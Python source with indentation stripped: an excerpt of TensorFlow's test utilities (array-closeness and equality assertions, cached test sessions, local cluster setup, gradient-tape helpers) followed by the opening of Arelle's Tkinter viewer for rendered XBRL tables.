[`numpy.allclose`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html)
(and numpy.testing.assert_allclose). It checks whether two arrays are
element-wise equal within a tolerance. The relative difference
(`rtol * abs(b)`) and the absolute difference `atol` are added together
to compare against the absolute difference between `a` and `b`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested structure of
these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested structure of
these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything that can be converted to one.
b: the actual numpy ndarray or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested structure of
these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested structure of
these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
except AssertionError:
return
msg = msg or ""
raise AssertionError("The two values are close at all elements. %s" % msg)
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything that can be converted to one.
b: the actual numpy ndarray or anything that can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %r. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = %r" % x)
msgs.append("not equal rhs = %r" % y)
# Handle mixed string types as a result of PY2to3 migration. That is, the
# mixing between bytes (b-prefix strings, PY2 default) and unicodes
# (u-prefix strings, PY3 default).
if six.PY3:
if (a.dtype.kind != b.dtype.kind and
{a.dtype.kind, b.dtype.kind}.issubset({"U", "S", "O"})):
a_list = []
b_list = []
# OK to flatten `a` and `b` because they are guaranteed to have the
# same shape.
for out_list, flat_arr in [(a_list, a.flat), (b_list, b.flat)]:
for item in flat_arr:
if isinstance(item, str):
out_list.append(item.encode("utf-8"))
else:
out_list.append(item)
a = np.array(a_list)
b = np.array(b_list)
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
a: the expected numpy ndarray or anything that can be converted to one.
b: the actual numpy ndarray or anything that can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements. %s" % msg)
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
if np.ndim(value) == 0:
return [prefix + "[0] : " + str(value)]
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
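# Usage sketch (added commentary, not part of the original class): e.g. for
# integer class predictions, with `predictions` as an illustrative name:
#
#   self.assertAllInSet(predictions, {0, 1, 2})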
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
# _GetNdArray returns a single ndarray; also handle a list of arrays so that
# `arrays` is always defined.
arrays = target if isinstance(target, list) else [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
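# Usage sketch (added commentary, not part of the original class): the regex
# form is matched (partially) against the OpError message raised while running
# an op; `bad_op` is an illustrative placeholder:
#
#   with self.assertRaisesOpError("Incompatible shapes"):
#     self.evaluate(bad_op)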
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3+ compatibility issues
if not six.PY2:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
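# Note (added commentary, not part of the original module): because of the
# crash_if_inconsistent_args checks above, cached_session() must be called with
# the same graph/config/force_gpu combination throughout a single test;
# mixing, e.g., self.cached_session() and self.cached_session(force_gpu=True)
# in one test raises the ValueError shown above.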
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture

The figure illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
import portpicker # pylint: disable=g-import-not-at-top
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
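# Illustrative sketch (added, not part of the original module): a minimal,
# self-contained use of get_node_def_from_graph() on a hand-built GraphDef.
# The helper name and the node name "my_node" are hypothetical.
def _example_get_node_def_from_graph():
  graph_def = graph_pb2.GraphDef()
  node = graph_def.node.add()
  node.name = "my_node"
  node.op = "NoOp"
  return get_node_def_from_graph("my_node", graph_def)  # returns that NodeDef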
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer == producer_version
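# Illustrative sketch (added, not part of the original module): the helper name
# is hypothetical and producer version 24 is an arbitrary example value.
def _example_set_producer_version():
  graph = ops.Graph()
  set_producer_version(graph, 24)
  return graph.graph_def_versions.producer  # 24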
@contextlib.contextmanager
def _fake_gradient_tape_context_manager():
"""tf.gradients(...) implemented as tf.GradientTape context manager interface.
This is useful for testing tf.gradients() in tests that use tf.GradientTape().
Yields:
gradient tape instance that's implemented by tf.gradients() underneath.
"""
try:
class FakeGradientTape:
def watch(self, x):
pass
def gradient(self, y, x, grad_ys=None):
result = gradients_impl.gradients(y, x, grad_ys)
# Unlike `tape.gradient()`, `tf.gradients()` returns a list for a single
# element. So unpack if needed to match `tape.gradient()` behavior.
if not isinstance(x, (list, tuple)):
assert len(result) == 1
return result[0]
return result
yield FakeGradientTape()
finally:
pass
class AbstractGradientTape:
"""Abstract GradientTape context manager that has multiple implementations.
This is useful to test both tf.GradientTape() and tf.gradients() without
duplicating tests.
"""
def __init__(self, use_tape, persistent=False):
self._use_tape = use_tape
self._persistent = persistent
def __enter__(self):
if self._use_tape:
self._tape_impl = backprop.GradientTape(persistent=self._persistent)
else:
self._tape_impl = _fake_gradient_tape_context_manager()
return self._tape_impl.__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
self._tape_impl.__exit__(exc_type, exc_val, exc_tb)
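# Illustrative sketch (added, not part of the original module): running the
# same gradient computation through either implementation. The helper name is
# hypothetical, and the use_tape=False branch assumes V1 graph mode since it is
# backed by tf.gradients().
def _example_abstract_gradient_tape(use_tape):
  x = ops.convert_to_tensor(3.0)
  with AbstractGradientTape(use_tape=use_tape) as tape:
    tape.watch(x)
    y = x * x
  return tape.gradient(y, x)  # gradient of x*x at 3.0, i.e. 6.0 once evaluated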
@contextlib.contextmanager
def run_functions_eagerly(run_eagerly):
"""Runs functions eagerly if `run_eagerly` is true.
WARNING: Setting `run_eagerly` to True in tests running in V1 graph mode
*WILL NOT* make the tf.function run eagerly because eager execution is disabled by
default in V1. Instead, tf.function will run as a traced graph function.
Ensures that the state (for running functions eagerly) is back to the initial
`def_function.RUN_FUNCTIONS_EAGERLY` state.
Args:
run_eagerly: Boolean determining whether to run the function eagerly or not.
Raises:
ValueError: If `run_eagerly` is not a boolean.
Yields:
Nothing.
"""
if not isinstance(run_eagerly, bool):
raise ValueError(
"Expected bool for `run_eagerly` but got {}".format(run_eagerly))
is_eager = context.executing_eagerly()
if not is_eager and run_eagerly:
logging.warning(
"Running tf.function eagerly in V1 graph mode is not supported. "
"tf.function will be run as a traced graph function.")
initial_state = def_function.functions_run_eagerly()
def_function.run_functions_eagerly(run_eagerly)
try:
yield
finally:
def_function.run_functions_eagerly(initial_state)
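# Illustrative sketch (added, not part of the original module): wrapping a
# tf.function call so it executes eagerly and the prior setting is restored
# afterwards. The helper name is hypothetical; per the warning above this only
# has an effect outside V1 graph mode.
def _example_run_functions_eagerly():
  @def_function.function
  def double(x):
    return x * 2
  with run_functions_eagerly(True):
    return double(ops.convert_to_tensor(2))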
|
ViewWinRenderedGrid.py
|
'''
Created on Oct 5, 2010
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
import os, threading, time, logging
from tkinter import Menu, BooleanVar, font as tkFont
from arelle import (ViewWinTkTable, ModelDocument, ModelDtsObject, ModelInstanceObject, XbrlConst,
ModelXbrl, Locale, FunctionXfi,
ValidateXbrlDimensions)
from arelle.ModelValue import qname, QName
from arelle.RenderingResolver import resolveAxesStructure, RENDER_UNITS_PER_CHAR
from arelle.ModelFormulaObject import Aspect, aspectModels, aspectModelAspect
from arelle.ModelInstanceObject import ModelDimensionValue
from arelle.ModelRenderingObject import (ModelClosedDefinitionNode, ModelEuAxisCoord,
ModelFilterDefinitionNode,
OPEN_ASPECT_ENTRY_SURROGATE)
from arelle.FormulaEvaluator import init as formulaEvaluatorInit, aspectMatches
from arelle.FunctionXfi import concept_relationships # needed by bodyCells below; assumed to live in FunctionXfi
from arelle.PrototypeInstanceObject import FactPrototype
from arelle.UITkTable import XbrlTable
from arelle.DialogNewFactItem import getNewFactItemOptions
from collections import defaultdict
from arelle.ValidateXbrl import ValidateXbrl
from arelle.XbrlConst import eurofilingModelNamespace, eurofilingModelPrefix
from arelle.ValidateXbrlDimensions import isFactDimensionallyValid
from arelle.XmlValidate import UNVALIDATED, validate as xmlValidate
try:
from tkinter import ttk
_Combobox = ttk.Combobox
except ImportError:
from ttk import Combobox
_Combobox = Combobox
emptyList = []
ENTRY_WIDTH_IN_CHARS = 12 # width of a data column entry cell in characters (nominal)
ENTRY_WIDTH_SCREEN_UNITS = 100
PADDING = 20 # screen units of padding between entry cells
qnPercentItemType = qname("{http://www.xbrl.org/dtr/type/numeric}num:percentItemType")
qnPureItemType = qname("{http://www.xbrl.org/2003/instance}xbrli:pureItemType")
integerItemTypes = {"integerItemType", "nonPositiveIntegerItemType", "negativeIntegerItemType",
"longItemType", "intItemType", "shortItemType", "byteItemType",
"nonNegativeIntegerItemType", "unsignedLongItemType", "unsignedIntItemType",
"unsignedShortItemType", "unsignedByteItemType", "positiveIntegerItemType"}
TABLE_AXIS_ROLES = (XbrlConst.euTableAxis, XbrlConst.tableBreakdown, XbrlConst.tableBreakdownMMDD, XbrlConst.tableBreakdown201305, XbrlConst.tableBreakdown201301, XbrlConst.tableAxis2011)
'''
Returns a tuple with all known table axis roles
'''
def getTableAxisArcroles():
return TABLE_AXIS_ROLES
def viewRenderedGrid(modelXbrl, tabWin, lang=None):
modelXbrl.modelManager.showStatus(_("viewing rendering"))
view = ViewRenderedGrid(modelXbrl, tabWin, lang)
view.blockMenuEvents = 1
menu = view.contextMenu()
optionsMenu = Menu(view.viewFrame, tearoff=0)
optionsMenu.add_command(label=_("New fact item options"), underline=0, command=lambda: getNewFactItemOptions(modelXbrl.modelManager.cntlr, view.newFactItemOptions))
optionsMenu.add_command(label=_("Open breakdown entry rows"), underline=0, command=view.setOpenBreakdownEntryRows)
view.ignoreDimValidity.trace("w", view.viewReloadDueToMenuAction)
optionsMenu.add_checkbutton(label=_("Ignore Dimensional Validity"), underline=0, variable=view.ignoreDimValidity, onvalue=True, offvalue=False)
view.xAxisChildrenFirst.trace("w", view.viewReloadDueToMenuAction)
optionsMenu.add_checkbutton(label=_("X-Axis Children First"), underline=0, variable=view.xAxisChildrenFirst, onvalue=True, offvalue=False)
view.yAxisChildrenFirst.trace("w", view.viewReloadDueToMenuAction)
optionsMenu.add_checkbutton(label=_("Y-Axis Children First"), underline=0, variable=view.yAxisChildrenFirst, onvalue=True, offvalue=False)
menu.add_cascade(label=_("Options"), menu=optionsMenu, underline=0)
view.tablesMenu = Menu(view.viewFrame, tearoff=0)
menu.add_cascade(label=_("Tables"), menu=view.tablesMenu, underline=0)
view.tablesMenuLength = 0
view.menuAddLangs()
saveMenu = Menu(view.viewFrame, tearoff=0)
saveMenu.add_command(label=_("HTML file"), underline=0, command=lambda: view.modelXbrl.modelManager.cntlr.fileSave(view=view, fileType="html"))
saveMenu.add_command(label=_("Layout model"), underline=0, command=lambda: view.modelXbrl.modelManager.cntlr.fileSave(view=view, fileType="xml"))
saveMenu.add_command(label=_("XBRL instance"), underline=0, command=view.saveInstance)
menu.add_cascade(label=_("Save"), menu=saveMenu, underline=0)
view.view()
view.blockSelectEvent = 1
view.blockViewModelObject = 0
view.viewFrame.bind("<Enter>", view.cellEnter, '+')
view.viewFrame.bind("<Leave>", view.cellLeave, '+')
view.viewFrame.bind("<FocusOut>", view.onQuitView, '+')
view.viewFrame.bind("<1>", view.onClick, '+') # does not currently work (since tktable changes)
view.viewFrame.bind("<Configure>", view.onConfigure, '+') # frame resized, redo column header wrap length ratios
view.blockMenuEvents = 0
return view
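# Illustrative sketch (added commentary, not part of the original file): a GUI
# menu handler would typically open this view along the lines of
#
#   view = viewRenderedGrid(modelXbrl, cntlr.tabWinTopRt, lang=cntlr.labelLang)
#
# where cntlr.tabWinTopRt and cntlr.labelLang are assumed attribute names for
# the hosting tab widget and the preferred label language on the controller.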
class ViewRenderedGrid(ViewWinTkTable.ViewTkTable):
def __init__(self, modelXbrl, tabWin, lang):
super(ViewRenderedGrid, self).__init__(modelXbrl, tabWin, _("Table"),
False, lang, self.onQuitView)
self.newFactItemOptions = ModelInstanceObject.NewFactItemOptions(xbrlInstance=modelXbrl)
self.factPrototypes = []
self.aspectEntryObjectIdsNode = {}
self.aspectEntryObjectIdsCell = {}
self.factPrototypeAspectEntryObjectIds = defaultdict(set)
self.zOrdinateChoices = None
# context menu Boolean vars
self.options = self.modelXbrl.modelManager.cntlr.config.setdefault("viewRenderedGridOptions", {})
self.openBreakdownLines = self.options.setdefault("openBreakdownLines", 5) # ensure there is a default entry
self.ignoreDimValidity = BooleanVar(value=self.options.setdefault("ignoreDimValidity",True))
self.xAxisChildrenFirst = BooleanVar(value=self.options.setdefault("xAxisChildrenFirst",True))
self.yAxisChildrenFirst = BooleanVar(value=self.options.setdefault("yAxisChildrenFirst",False))
formulaEvaluatorInit() # one-time module initialization
def close(self):
